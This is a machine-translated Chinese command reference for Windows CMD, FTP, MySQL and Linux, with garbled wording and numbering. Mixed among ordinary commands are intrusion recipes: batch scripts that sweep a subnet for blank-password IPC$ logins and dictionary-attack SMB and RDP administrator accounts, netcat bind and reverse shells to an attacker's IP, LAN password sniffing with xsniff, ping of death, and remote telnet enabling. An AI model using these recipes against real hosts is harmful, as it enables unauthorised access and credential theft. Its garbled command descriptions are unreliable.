Shulou(Shulou.com)06/02 Report--

Running operation

CMD command: start-> run-> Type cmd or command (you can see the system version and file system version on the command line)

A collection of CMD commands

Gpedit.msc- Group Policy

2. Sndrec32- tape recorder

3. Nslookup-IP address detector is a command-line tool to monitor whether the DNS server in the network can correctly implement domain name resolution. It can be used in Windows NT/2000/XP, but it is not integrated in Windows 98.

4. Explorer- opens the explorer

5. Logoff- logout command

6. Shutdown-60 second countdown shutdown command

7. Lusrmgr.msc---- native users and groups

8. Services.msc--- local service settings

9. Oobe/msoobe / a murmuri-check if XP is activated

10. Notepad-, open your notepad

11. Cleanmgr- garbage sorting

12. Net start messenger---- starts messenger service

13. Compmgmt.msc--- computer management

14. Net stop messenger- stops messenger service

15. Conf- starts netmeeting

16. Dvdplay-DVD player

17. Charmap- startup character mapping table

18. Diskmgmt.msc--- disk Management Utility

19. Calc- starts the calculator

20. Dfrg.msc- disk Defragmenter

21. Chkdsk.exe-Chkdsk disk check

twenty-two。 Devmgmt.msc--- device Manager

23. Regsvr32 / u * .dll---- stops running the dll file

24. Drwtsn32- Systems Doctor

25. Rononce-PULMULMULMUR shuts down for 15 seconds

twenty-six。 Dxdiag- checks DirectX information

twenty-seven。 Regedt32- Registry Editor

twenty-eight。 Msconfig.exe--- system configuration Utility

twenty-nine。 Rsop.msc- Group Policy result set

thirty。 Mem.exe- displays memory usage

thirty-one。 Regedit.exe---- registry

thirty-two。 Winchat-XP has its own local area network chat

thirty-three。 Progman- Program Manager

thirty-four。 Winmsd- system Information

thirty-five。 Perfmon.msc---- computer performance Monitoring Program

thirty-six。 Winver- checks the Windows version

thirty-seven。 Sfc / scannow- scan error and recovery

thirty-eight。 Taskmgr- Task Manager (2000/xp/2003

forty。 Wmimgmt.msc---- Open windows Management Architecture (WMI)

forty-one。 Wupdmgr-windows updater

forty-two。 Wscript-windows script hosting Settings

forty-three。 Write- WordPad

forty-five。 Wiaacmgr- Scanner and camera Wizard

forty-six。 Winchat-XP has its own local area network chat

forty-nine。 Mplayer2- simple widnows media player

fifty。 Mspaint- drawing board

fifty-one。 Mstsc- remote Desktop connection

fifty-three。 Magnify- magnifying glass utility

fifty-four。 Mmc- opens the console

fifty-five。 Mobsync- synchronization command

fifty-seven。 Iexpress-*** bundling tool, included with the system

fifty-eight。 Fsmgmt.msc- shared folder Manager

fifty-nine。 Utilman- accessibility Manager

sixty-one。 Dcomcnfg- opens the system component service

sixty-two。 Ddeshare- opens DDE sharing settings

one hundred and ten。 Osk-, open the on-screen keyboard.

one hundred and eleven。 Odbcad32-ODBC data Source Manager

one hundred and twelve。 Oobe/msoobe / aMelli-check if XP is active

sixty-eight。 Ntbackup- system backup and restore

sixty-nine。 Narrator- screen "narrator"

seventy。 Ntmsmgr.msc---- Mobile Storage Manager

seventy-one。 Ntmsoprq.msc--- mobile storage administrator operation request

seventy-two。 The netstat-an---- (TC) command checks the interface

seventy-three。 Syncapp- creates a briefcase

seventy-four。 Sysedit- system configuration Editor

seventy-five。 Sigverif- file signature verifier

seventy-six。 Ciadv.msc- Index Service Program

seventy-seven。 Shrpubw- creates a shared folder

seventy-eight。 Secpol.msc- Local Security Policy

seventy-nine。 Syskey- system encryption, once encrypted can not be unlocked, protect the double password of windows xp system

eighty。 Services.msc--- Local Service Settings

eighty-one。 Sndvol32- volume control program

eighty-two。 Sfc.exe- system File Checker

eighty-three。 Sfc / scannow---windows file protection

eighty-four。 Ciadv.msc- Index Service Program

eighty-five。 Introduction to tourstart-xp (roaming xp program that appears after installation)

eighty-six。 Taskmgr- Task Manager

eighty-seven。 Eventvwr- event Viewer

eighty-eight。 Eudcedit- word-making program

eighty-nine。 Compmgmt.msc--- computer management

ninety。 Packager- object wrapper

ninety-one。 Perfmon.msc---- computer performance Monitoring Program

ninety-two。 Charmap- startup character mapping table

ninety-three。 Cliconfg-SQL SERVER client Network Utility

ninety-four。 Clipbrd- Clipboard Viewer

ninety-five。 Conf- starts netmeeting

ninety-six。 Certmgr.msc---- Certificate Management Utility

ninety-seven。 Regsvr32 / u * .dll---- stops running the dll file

ninety-eight。 Regsvr32 / u zipfldr.dll- cancels ZIP support

ninety-nine。 Cmd.exe-CMD command prompt

Detailed explanation of operation

Net use ipipc$ "" / user: "" establish an empty IPC link

Net use ipipc$ "password" / user: "user name" to establish an IPC non-empty link

Net use h: ipc$ "password" / user: "user name" is mapped to the other party after logging in directly. C: to the local is H:

Net use h: after ipc$ login, map the other party C: to the local H:

Net use ipipc$ / del remove IPC link

Net use h: / del removes the mapping from the other party to the local H:

Net user username password / add establish user

Net user guest / active:yes activate guest user

Net user to see which users there are.

Net user account name View the properties of the account

Net localgroup administrators username / add adds "user" to the administrator to give it administrator privileges

Net start to see which services are enabled

The net start service name enables the service (e.g. net start telnet, net start schedule)

Net stop service name stop a service

Net time target ip to check each other's time

Net time target ip / set sets the local computer time to synchronize with the time of the "target IP" host, plus the parameter / yes to cancel the confirmation message

Net view to see which shares are enabled on the local LAN

Net view ip to check which shares are enabled in each other's local area network.

Net config display system network settings

Net logoff disconnected sharing

Net pause service name pauses a service

Net send ip "text message" sends messages to each other.

Types and information of network connections in use within the net ver LAN

Net share to view locally opened shares

Net share ipc$ enables ipc$ sharing

Net share ipc$ / del delete ipc$ share

Net share c$ / del delete C: share

Net user guest 12345 changes the password to 12345 after logging in with guest.

Net password password change system login password

Netstat-a to check which ports are open, usually netstat-an

Netstat-n to view the network connection of the port, commonly used netstat-an

Netstat-v to view the work in progress

Netstat-p protocol name example: netstat-p tcq/ip to view the usage of a protocol

Netstat-s to view the usage of all protocols in use

If one of the ports of nbtstat-An ip is open, you can check the user name of the last login of the other party.

Tracert-the parameter ip (or computer name) tracks the route (packet), and the parameter "- w digit" is used to set the timeout interval.

Ping ip (or domain name) sends data with a default size of 32 bytes to the other host. The parameter: "- l [space] packet size"; "- n times of data sent"; "- t" refers to ping all the time.

Ping-t-l 65550 ip ping of death (sending files greater than 64K and ping all the time becomes the ping of death)

Ipconfig (winipcfg) is used for windows NT and XP (windows 9598) to view the local ip address. The parameter "/ all" available for ipconfig displays all configuration information.

Tlist-t shows the process in a tree line list (an additional tool for the system, which is not installed by default, in the Support/tools folder of the installation directory)

Kill-F process name plus-F parameter to force the termination of a process (an additional tool for the system, which is not installed by default, is in the Support/tools folder of the installation directory)

After adding the-F parameter to the del-F file name, you can delete read-only files. / AR, / AH, / AS, / AA means to delete read-only, hidden, system, and archived files, respectively. / AMUR, / AMUH, / AMUS, / AMUE A means to delete files other than read-only, hidden, system and archive. For example, "DEL/AR." Deletes all read-only files in the current directory, "DEL/A-S." Deletes all files except system files in the current directory

Del / S / Q directory or use: rmdir / s / Q directory / S to delete the directory and all subdirectories and files under the directory. At the same time, use the parameter / Q to cancel the deletion operation and delete it directly when the system confirms it. (the two commands have the same effect)

Move drive letter path the file name to be moved the path to store the mobile file after the file name is moved, the prompt to confirm the existence of the same file in the mobile directory will be canceled with the parameter / y and will be overwritten directly

Fc one.txt two.txt > 3st.txt compares the two files and outputs the differences to the 3st.txt file. ">" and "> >" are redirect commands.

At id opens a scheduled task that has been registered

At / delete stops all scheduled tasks. With parameter / yes, it stops without confirmation.

At id / delete to stop a registered scheduled task

At views all scheduled tasks

At ip time program name (or a command) / r run a program at a certain time and restart the computer

Finger username @ host to see which users have logged in recently

Telnet ip port is far away and login server, default port is 23

Open ip connects to IP (command after telnet login)

Telnet will enter the local telnet by typing telnet directly on the local machine.

Copy path file name 1 path file name 2 / y copy file 1 to the specified directory as file 2, use the parameter / y to cancel to confirm that you want to rewrite an existing directory file

Copy c:srv.exe ipadmin$ copy the local c:srv.exe to the other party's admin

Copy 1st.jpg/b+2st.txt/a 3st.jpg hides the contents of 2st.txt into 1st.jpg to generate a new 3st.jpg file. Note: 2st.txt file header should be blank in three rows, parameter: / b refers to binary file, / a refers to ASCLL format file.

Copyipadmin$ svv.exe c: or: copyipadmin$. Copy the srv.exe file (all files) under the other party's admini$ share to the local C:

File or directory tree to be copied by xcopy destination address directory name copy file and directory tree, overwrite the same file without prompting with parameter / Y

Use the parameter / e to copy the subdirectories under the directory to the destination address.

Tftp-I own IP (meat machine IP when using meat machine as springboard) get server.exe c:server.exe login, download the server.exe of "IP" to the target host c:server.exe parameter:-I means to transfer in binary mode, such as when transferring exe files, if you do not add-I, transfer in ASCII mode (transfer text file mode)

After tftp-I IP put c:server.exe login, upload the local c:server.exe to the host

The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to binary transfer (executable file feed); defaults to ASCII format transfer (when text files)

Route print shows IP routes, which will mainly show network address Network addres, subnet mask Netmask, gateway address Gateway addres, interface address Interface

Arp looks at and processes the ARP cache. ARP means name resolution and is responsible for parsing an IP into a physical MAC address. Arp-a will display all the information

Start program name or command / max or / min opens a new window and maximizes (minimizes) running a program or command

Mem to view cpu usage

Attrib file name (directory name) view the properties of a file (directory)

Attrib file name-A-R-S-H or + A + R + S + H removes (adds) the archive, read-only, system, hidden attribute of a file, or adds as an attribute with +

Parameters: / Q shows which user the file and directory belong to, / dir C shows the creation time of the file, / dir A shows the time when the file was last accessed, and / TRAV W was last modified.

Date / t, time / t use this parameter, that is, "DATE/T" and "TIME/T" will only display the current date and time, without having to enter a new date and time

Set specifies the environment variable name = the character to assign to the variable sets the environment variable

Set displays all current environment variables

Set p (or other characters) displays all environment variables that currently begin with the character p (or other characters)

Pause pauses the batch program and displays: press any key to continue.

If performs conditional processing in a batch program (see if commands and variables for more instructions)

The goto tag directs the cmd.exe to the tagged line in the batch program (the label must be on a separate line and begin with a colon, for example: ": start" tag)

The call path batch filename calls another batch program from the batch program (see call /? for more instructions)

For executes a specific command on each file in a set of files (see for commands and variables for more instructions)

Echo on or off turns echo on or off. Only use echo without parameters to display the current echo settings.

Echo information displays information on the screen

Echo Information > > pass.txt saves the Information to the pass.txt file

Findstr "Hello" aa.txt looks for the string hello in the aa.txt file

Find a file by find filename

Title title name change CMD window title name

Color color values set the foreground and background colors of the cmd console; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, C = light red, D = lavender, E = light yellow, F = bright white

Prompt name changes the command prompt displayed by cmd.exe (change C:, D: unified to: EntSky)

Ver displays version information under the DOS window

Winver pops up a window showing version information (memory size, system version, patch version, computer name)

Format drive letter / FS: type format disk, type: FAT, FAT32, NTFS, for example: Format D: / FS:NTFS

Md directory name create directory

Directory replacement file for the replace source file to replace the file

Ren original file name new file name rename file name

Tree displays the directory in a tree structure, and the file names in the folder are listed with the parameter-f

The type file name displays the contents of the text file

More file name displays the output file screen by screen

Command = character to be locked by doskey

Doskey to unlock command = lock command provided for DOS (edit the command line, re-invoke the win2k command, and create a macro). For example: lock dir command: doskey dir=entsky (cannot use doskey dir=dir); unlock: doskey dir=

Taskmgr call-up Task Manager

Chkdsk / F D: check disk D and display status report; add parameter / f and fix errors on disk

Tlntadmn telnt service admn, type tlntadmn, select 3, and then select 8, you can change the telnet service default port 23 to any other port

Exit exits the cmd.exe program or currently, using parameter / B exits the current batch script instead of cmd.exe

The file name of the path path executable sets a path for the executable.

Cmd launches a win2K command interpretation window. Parameters: / eff, / en turn off and enable command extension. For more details, please see cmd /?

Regedit / s registry file name is imported into the registry; parameter / S refers to quiet mode import without any prompt

Regedit / e registry file name export registry

The cacls filename parameter displays or modifies a file access control list (ACL) for NTFS format. Parameters: / D user name: set to deny a user access; / P user name: perm to replace the specified user's access rights; / G user name: perm gives the specified user access rights; Perm can be: n none, R read, W write, C change (write), F full control; for example: cacls D: est.txt / D pub setting d: est.txt deny pub user access.

Cacls filename View the list of access user permissions for the file

REM text content adds annotations to batch files

Netsh view or change local network configuration

IIS service command

Iisreset / reboot restart the win2k computer (but there is a prompt that the system restart message will appear)

Iisreset / start or stop start (stop) all Internet services

Iisreset / restart stop and restart all Internet services

Iisreset / status displays the status of all Internet services

Iisreset / enable or disable enable (disable) restart of the Internet service on the local system

Iisreset / rebootonerror when starting, stopping or restarting the Internet service, it will restart if an error occurs

Iisreset / noforce if the Internet service cannot be stopped, the Internet service will not be forcibly terminated

Iisreset / timeout Val still does not stop the Internet service when the time elapsed (seconds). If the / rebootonerror parameter is specified, the computer will restart. The default value is to restart for 20 seconds, stop for 60 seconds, and restart for 0 seconds.

FTP command: (more details later)

The command line format for ftp is:

Ftp-v-d-I-n-g [hostname]-v displays all the response information for the remote server.

-d uses debug mode.

-n restrict automatic login of ftp, that is, do not use .netrc files.

-g cancels the global file name.

Help [command] or? [command] View command description

Bye or quit terminates the host FTP process and exits FTP management.

Pwd lists the current remote host directory

Put or send local file name [file name uploaded to the host] transfers a local file to the remote host

Get or recv [remote host filename] [filename downloaded locally] is transferred from the remote host to the local host

Mget [remote-files] receives a batch of files from the remote host to the local host

Mput local-files transfers a batch of files from the local host to the remote host

Dir or ls [remote-directory] [local-file] lists the files in the current remote host directory. If there is a local file, write the result to the local file

Ascii setting to transfer files in ASCII mode (default)

Bin or image setting to transfer files in binary mode

Every time bell completes a file transfer, an alarm will be given.

Cdup returns to the previous directory

Close interrupts the ftp session with the remote server (corresponding to open)

Open host [port] establish a specified ftp server connection, and you can specify a connection port

Delete deletes files from the remote host

Mdelete [remote-files] deletes a batch of files

Mkdir directory-name sets up a directory in the remote host

Rename [from] [to] change the file name in the remote host

Rmdir directory-name deletes a directory from a remote host

Status displays the status of the current FTP

System displays the remote host system type

User user-name [password] [account] re-log in to the remote host with a different user name

Open host [port] re-establish a new connection

Prompt interactive prompt mode

Macdef define Macro Command

Lcd changes the working directory of the current local host. If default, it changes to the current user's HOME directory.

Chmod changes file permissions of remote hosts

When case is ON, the file names copied with the MGET command are transferred to the local machine and all converted to lowercase letters

Cd remote-dir enters the remote host directory

Cdup enters the parent directory of the remote host directory

! Perform interactive shell,exit in the local machine to return to the ftp environment, such as! ls.zip

# 5

MYSQL command

Mysql-h host address-u username-p password connection MYSQL; if MYSQL has just been installed, the superuser root does not have a password.

(example: mysql-h210.110.110.110-Uroot-P123456

Note: U and root can not add spaces, others are the same)

Exit exits MYSQL

Mysqladmin-u username-p old password password new password change password

Grant select on database. To username @ login host identified by "password"; add new users. (note: unlike the above, the following is a command in the MYSQL environment, so it is followed by a semicolon as the command Terminator)

Show databases; displays a list of databases. At the beginning, there were only two databases: mysql and test. The mysql library is very important. it contains the system information of MYSQL. We actually use this library to change passwords and add users.

Use mysql

Show tables; displays the data table in the library

Describe table name; displays the structure of the data table

Create database library name; build library.

Use library name

Create table table name (list of field settings); create table

Drop database library name

Drop table table name; delete library and delete table

Delete from table name; empty the records in the table

Select * from table name; displays records in the table

Mysqldump-- opt school > school.bbb backup database: (the command is executed in the mysqlin directory of DOS); Note: back up the database school to the school.bbb file, school.bbb is a text file, the file name is taken, open to see what you will find.

New commands under win2003 system (practical part):

The shutdown / parameter shuts down or restarts the local or remote host.

Parameter description: / S shuts down the host, / R restarts the host, / T digits to set the delay time, range 0,180 seconds, / A cancels boot, / M / / IP specifies the remote host.

Example: shutdown / r / t 0 restarts the local host immediately (without delay)

Taskill / Parameter process name or process pid terminates one or more tasks and processes.

Parameter description: / PID to terminate the pid of the process, you can use the tasklist command to obtain the process name of the process to be terminated by the pid,/IM of each process, / F to force the termination of the process, / T to terminate the specified process and the child processes he started.

Tasklist displays the process identifiers (PID) of processes, services, and service processes currently running on local and remote hosts.

Parameter description: / M lists the dll file loaded by the current process, / SVC shows the corresponding service for each process, and only the current process is listed when there are no parameters.

Basic commands under Linux system Note: be case sensitive

Uname displays version information (same as ver of win2K)

Dir displays current directory files, ls-al display includes hidden files (same as dir of win2K)

Pwd queries the location of the current directory

Cd cd.. Go back to the previous directory and notice that cd and.. There is a space between them. Cd / return to the root directory.

Cat file name view file contents

Cat > abc.txt writes to the abc.txt file.

The more file name displays a text file on a page-by-page basis.

Cp copy Fil

Mv moves files

Rm file name delete file, rm-a directory name delete directory and subdirectory

Mkdir directory name set up a directory

Rmdir deletes the subdirectory and there are no documents in the directory.

Chmod sets access to files or directories

Grep looks for strings in the archive

Comparison of diff Archives

Find file search

Current date and time of date

Who queries the people who are currently using the same machine as you and the time and place of Login

W query the details of the current passengers.

Whoami check your account name.

Groups check someone's Group

Passwd change password

History checks the commands he has given

Ps displays the status of the process

Kill stops a process

It is usually used by gcc to compile files written in C language.

Su permissions are converted to the specified user

Telnet IP telnet connects to the other host (same as win2K). When bash$ appears, the connection is successful.

Ftp ftp connects to a server (same as win2K)

Batch commands and variables

Basic format of 1:for commands and variables

FOR / parameter% variable IN (set) DO command [command_parameters]% variable: specify a single letter replaceable parameter, such as:% I, while specifying a variable uses:% I, and when calling a variable:% I%, the variable is case sensitive (% I is not equal to% I).

A total of 10 variables can be processed in a batch from% 0mi% 9, of which% 0 is used by default for the batch file name, and% 1 defaults to the first value entered when using this batch. Similarly:% 2 color% 9 refers to the 2-9 values entered; for example: ip is% 1 in net use ipipc$ pass / user:user, user is% 2, user is% 3.

(set): specify a file or group of files, using wildcards, such as: (D:user.txt) and (1254) (1-1254), {"(1254)" the first "1" refers to the starting value, the second "1" refers to the growth, and the third "254" refers to the end value, that is, from 1 to 254; "(1-1254)" description: from 254to 1}

Command: specifies the command to be executed on the first file, such as the net use command; if multiple commands are to be executed, the command is separated by: &

Command_parameters: specify parameters or command line switches for specific commands

IN (set): means to take a value in (set); DO command: means to execute command

Parameters: / L refers to the incremental form {(set) for incremental form}; / F refers to taking values from the file until the end {(set) is a file, such as (d:pass.txt)}.

Examples of usage:

@ echo off

Echo usage format: test.bat.. > test.txt

For / L%% G in (11 254) do echo% 1% G > > test.txt & net use\% 1% G / user:administrator | find "command completed successfully" > > test.txt

Save as test.bat description: for a specified class C network segment of 254IP in turn try to establish an administrator password is empty IPC$ connection, if successful, the IP is stored in the test.txt.

/ L means in incremental form (that is, from 1-254 or 254-1); the first three digits of the input IP:. For batch processing, the default% 1%% G is the variable (the last bit of ip); & it is used to separate the commands echo and net use; | after the ipc$ is established, use find to check whether there is a "command completed successfully" information in the result;% 1%% G is the complete IP address; (11254) refers to the starting value, growth, and ending value.

@ echo off

Echo usage format: ok.bat ip

FOR / F I IN (D:user.dic) DO smb.exe 1 I D:pass.dic 200

Save as: ok.exe description: after entering an IP, use the dictionary file d:pass.dic to expose the user password in d:user.dic until the value in the file is taken out. I is the user name; 1 is the entered IP address (default).

Seven:

Basic format of 2:if commands and variables

IF [not] errorlevel numeric command statement specifies that the condition is true if the program finally returns an exit code equal to or greater than the specified number.

Example: IF errorlevel 0 command refers to the command after the value line when the value returned by the program is 0; IF not errorlevel 1 command means that the last value returned by the program execution is not equal to 1, then the following command is executed.

0 refers to discovery and successful execution (true); 1 refers to no discovery, no execution (false).

IF [not] string 1 string = string 2 command statement executes the following command if the specified text string matches (that is, string 1 equals string 2).

Example: "if"% 2 "=" 4 "goto start" means: if the second variable entered is 4, execute the following command (note: when calling the variable, the variable name is% and add "")

IF [not] exist filename command statement executes the following command if the specified filename exists.

Example: "if not nc.exe goto end" means: if you do not find the nc.exe file, skip to the ": end" tag.

IF [not] errorlevel numeric command statement else command statement or IF [not] string 1 "= string 2 command statement else command statement or IF [not] exist file name command statement else command statement plus: else command statement means: when the previous condition is not true, it refers to the command after the line else. Note: else must be on the same line as if to be valid. When there is a del command, you need to use the full contents of the del command.

< >

To sum up, because the del command can only be executed on a separate line, use the

< >

After that is equivalent to a separate line; for example: "if exist test.txt. Else echo test.txt.missing", pay attention to the "." in the command.

System external command

Note: external commands of the system (related tools need to be downloaded)

Switzerland × ×: nc.exe

Parameter description:

-h View help information

-d background mode

-e prog program redirect, execute as soon as it is connected [dangerous]

-I interval of secs delay

-l snooping mode for inbound connections

-L monitoring mode, which will continue to monitor after the connection is closed until CTR+C

-n IP address, domain name cannot be used

-o film records hexadecimal transmission

-p [blank] port local port number

-r Random local and remote ports

-t use Telnet interaction

-u UDP mode

-v detailed output, more detailed with-vv

-w digital timeout delay interval

-z turn off input and output (when sweeping anchor)

Basic usage:

Nc-nvv 192.168.0.1 80 connects to port 80 of the 192.168.0.1 host

Nc-l-p 80 open TCP port 80 of this machine and listen

Nc-nvv-w2-z 192.168.0.1 80-1024 sweep anchor port 80-1024 of 192.168.0.1

Nc-l-p 5354-t-e c:winntsystem32cmd.exe binds cmdshell of remote host on TCP 5354 port of remote

Nc-t-e c:winntsystem32cmd.exe 192.168.0.2 5354 Bangding remote host cmdshell and reverse connect port 5354 of 192.168.0.2

Advanced usage:

Nc-L-p 80 is used as a honeypot 1: open and constantly monitor port 80 until CTR+C

Nc-L-p 80 > c:log.txt as honeypot 2: open and keep listening to port 80 until CTR+C, while outputting the results to c:log.txt

Nc-L-p 80

< c:honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中，亦可起到传送文件作用 　　type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用 　　本机上用：nc -l -p 本机端口 　　在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 win2K 　　nc -e /bin/sh 本机IP -p 本机端口 linux,unix 反向连接突破对方主机的防火墙 　　本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称 　　在对方主机上用：nc -vv 本机IP 本机端口 >

The path and name of the file to transfer the file to the host of the other party

Remarks:

| | Pipeline command |

< 或 >

Redirect command. "" Means: overwrite; "> >" means: save to (add to).

For example, @ dir c:winnt > > d:log.txt and @ dir c:winnt > d:log.txt are executed twice to compare: using > > saves the results of the second time, while using: > has only one result, because the second result overwrites the first one.

Eight:

Scanning tool: xscan.exe

Basic format

Xscan-host [-] [other options] sweep all host information for the anchor "start IP to end IP" section

Xscan-file [other options] sweep all host information in the Host IP list File name

Test item

-active to check whether the host is alive

-os detects remote operating system types (through NETBIOS and SNMP protocols)

-port detects the port status of common services

-ftp detects FTP weak password

-pub detects anonymous user write permissions for FTP services

-pop3 detects POP3-Server weak password

-smtp detects SMTP-Server vulnerabilities

-sql detects SQL-Server weak password

-smb detects NT-Server weak password

-iis detects IIS encoding / decoding vulnerabilities

-cgi detects CGI vulnerabilities

-nasl loads Nessus*** script

-all detects all the above items

Other options

-I adapter number sets the network adapter, which can be obtained through the "- l" parameter

-l displays all network adapters

-v shows detailed scan progress

-p skips hosts that are not responding

-o Skip hosts that do not detect open ports

-t the number of concurrent threads, and the number of concurrent hosts specifies the maximum number of concurrent threads and the number of concurrent hosts. The default number is 100 and 10.

-log file name specifies the scan report file name (suffix: TXT or HTML format file)

Usage example

Xscan-host 192.168.1.1-192.168.255.255-all-active-p detects all vulnerabilities of hosts in the 192.168.1.1-192.168.255.255 network segment, skipping unresponsive hosts

Xscan-host 192.168.1.1-192.168.255.255-port-smb-t 150-o detect the standard port status of hosts in the 192.168.1.1-192.168.255.255 network segment, NT weak password users, the maximum number of concurrent threads is 150, skip hosts that do not detect open ports

Xscan-file hostlist.txt-port-cgi-t 2005v-o detects the standard port status of all hosts listed in the "hostlist.txt" file, CGI vulnerability, and the maximum number of concurrent threads is 200. a maximum of 5 hosts are detected at the same time, showing detailed detection progress, and skipping hosts that do not detect open ports.

Nine:

Command-line sniffer: xsniff.exe

Can capture FTP/SMTP/POP3/HTTP protocol password in local area network

Parameter description

-tcp output TCP Datagram

-udp output UDP Datagram

-icmp output ICMP Datagram

-pass filter password information

-hide runs in the background

-host resolves hostname

-addr IP address filtering IP address

-port port filter port

-log file name saves the output to a file

-asc output in ASCII format

-hex output in hexadecimal format

Usage example

Xsniff.exe-pass-hide-log pass.log background runs to sniff the password and save the password information in the pass.log file

Xsniff.exe-tcp-udp-asc-addr 192.168.1.1 sniff 192.168.1.1 and filter tcp and udp information and output in ASCII format

Terminal Services password cracking: tscrack.exe

Parameter description

-h display usage help

-v displays version information

-s type the decryption ability on the screen

-b the sound made when the password is wrong

-t sends out multiple connections (multithreaded)

-N Prevent System Log entries on targeted server

-U Uninstall remove tscrack components

-f use the password after-f

-F interval (frequency)

-l uses the user name after-l

-w uses the password dictionary after-w

-p use the password after-p

-D log in to the main page

Usage example

Tscrack 192.168.0.1-l administrator-w pass.dic remote password dictionary file breaks the login password of the host administrator

Tscrack 192.168.0.1-l administrator-p 123456 remote login administrator users of 192.168.0.1 with password 123456

@ if not exist ipcscan.txt goto noscan

@ for / f "tokens=1 delims=" I in (3389.txt) do call hack.bat% I

Nscan

@ echo 3389.txt no find or scan faild

(① saved as 3389.bat) (assuming that the existing SuperScan or other anchor sweeper scans to a batch of host IP list files with 3389 open 3389.txt)

3389.bat means: take an IP from the 3389.txt file and run hack.bat

@ if not exist tscrack.exe goto noscan

@ tscrack 1-l administrator-w pass.dic > > rouji.txt

: noscan

@ echo tscrack.exe no find or scan faild

(save ② as hack.bat) (run 3389.bat to OK, and 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe are in the same directory; you can wait for the result)

Hack.bat means: run tscrack.exe to break the administrator passwords of all hosts in 3389.txt with a dictionary, and save the cracking results in the rouji.txt file.

Other

Shutdown.exe

Shutdown IP address tWindows automatically shuts down the NT of the other party after 20 seconds (the Windows 2003 system comes with a tool, which can only be downloaded if you use it under Windows2000. It is described in detail in the previous Windows 2003 DOS command. )

Fpipe.exe (TCP Port Redirection tool) is described in detail in the second article (Port Redirection Bypass Firewall)

Fpipe-l 80-s 1029-r 80 when someone sweeps your port 80, the result he scans will be the host information.

Fpipe-l 23-s 88-r 23 destination IP sends port 23 Telnet requests sent locally to the destination IP via port 88 to port 23 of the destination IP after being redirected through the port. (port 88, which is used locally when establishing a Telnet with the target IP, is connected to it) then: direct Telnet 127.0.0.1 (native IP) is connected to port 23 of the target IP.

OpenTelnet.exe (open the telnet tool remotely)

Opentelnet.exe IP account password ntlm authentication method Telnet port (there is no need to upload ntlm.exe to destroy Microsoft's authentication method) after opening the other party's telnet service remotely, you can use telnet ip to connect to each other.

NTLM authentication method: 0: do not use NTLM authentication; 1: try NTLM authentication first, and then use username and password if failed; 2: use only NTLM authentication.

ResumeTelnet.exe (another tool shipped with OpenTelnet)

After the resumetelnet.exe IP account password connects to the other party with Telnet, use this command to restore the other party's Telnet settings and shut down the Telnet service at the same time.

Detailed explanation of FTP command

FTP command is one of the most frequently used commands for Internet users. Familiar with and flexible application of FTP internal commands can greatly facilitate users and get twice the result with half the effort. If you want to learn how to use it for background FTP downloads, you must learn the FTP instructions.

The command line format for FTP is:

Ftp-v-d-I-n-g [hostname], where

-v displays all response information of the remote server

-n restrict the automatic login of ftp, that is, do not use; .n etrc file

-d use debug mode

-g cancels the global file name.

The internal commands used by FTP are as follows (square brackets indicate optional):

1! [cmd [ARGs]]: execute interactive shell,exit in the local machine to return to the ftp environment, such as:! ls.zip

2.$ macro-ame [args]: executes the macro definition macro-name.

3.account [password]: provides the supplementary password required to access system resources after a successful login to the remote system.

4.append local-file [remote-file]: appends local files to the remote system host, or uses the local file name if the remote system file name is not specified.

5.ascii: use ascii type transport.

6.bell: the computer rings once after each command is executed.

7.bin: use binary file transfer.

8.bye: exits the ftp session process.

9.case: when using mget, change the uppercase to lowercase letters in the remote host file name.

10. Cd remote-dir: enter the remote host directory.

11.cdup: enter the parent directory of the remote host directory.

12.chmod mode file-name: set the access mode of the remote host file file-name to mode, such as chmod 777 a.out.

13.close: interrupts the ftp session with the remote server (corresponding to open).

14. Cr: when transferring files in asscii mode, enter newline is converted to return line.

15.delete remote-file: delete the remote host file.

16.debug [debug-value]: sets the debug mode to display every command sent to the remote host, such as deb up 3. Setting it to 0 means canceling debug.

17.dir [remote-dir] [local-file]: displays the remote host directory and stores the results in a local file.

18.disconnection: same as close.

19.form format: sets the file transfer mode to format and defaults to file mode.

20.get remote-file [local-file]: transfer the file remote-file of the remote host to the local-file of the local hard disk.

21.glob: sets the filename extension for mdelete,mget,mput. By default, the filename is not extended, same as the-g argument on the command line.

22.hash: displays a hash symbol (#) for every 1024 bytes transferred.

23.help [cmd]: displays help information for the ftp internal command cmd, such as help get.

24.idle [seconds]: sets the sleep timer of the remote server to [seconds] seconds.

25.image: sets the binary transfer mode (same as binary).

26.lcd [dir]: change the local working directory to dir.

twenty-seven。 Ls [remote-dir] [local-file]: displays the remote directory remote-dir and saves it to the local file local-file.

28.macdef macro-name: define a macro that ends when a blank line under macdef is encountered.

29.mdelete [remote-file]: deletes the remote host file.

30.mdir remote-files local-file: similar to dir, but can specify multiple remote files, such as: mdir .o. * .zipoutfile.

31.mget remote-files: transfer multiple remote files.

32.mkdir dir-name: create a directory on the remote host.

33.mls remote-file local-file: same as nlist, but multiple file names can be specified.

34.mode [modename]: sets the file transfer mode to modename and defaults to stream mode.

35.modtime file-name: displays the last modification time of the remote host file.

36.mput local-file: transfer multiple files to a remote host.

37.newer file-name: if the modification time of the file-name on the remote machine is closer than that of the file with the same name on the local hard disk, retransmit the file.

38.nlist [remote-dir] [local-file]: displays the file list of the remote host directory and saves it to the local-file of the local hard disk.

39.nmap [inpattern outpattern]: set the file name mapping mechanism, so that when a file is transferred, some characters in the file are converted to each other, such as: nmap $1.account2.account3 [$1jijin2]. [$2memename 3], then when transferring the file a1.a2.a3, the filename becomes a1jina2. This command is especially suitable for situations where the remote host is a non-UNIX machine.

40. N transfer [inchars [outchars]]: set the translation mechanism of file name characters, such as ntrans1R, then the file name LLL will become RRR.

41.open host [port]: a specified ftp server connection is established, and the connection port can be specified.

42.passive: enter the passive transmission mode.

43.prompt: sets interactive prompts for multiple file transfers.

44.proxy ftp-cmd: in a secondary control connection, execute a ftp command that allows two ftp servers to be connected to transfer files between the two servers. The first ftp command must be open to first establish a connection between the two servers.

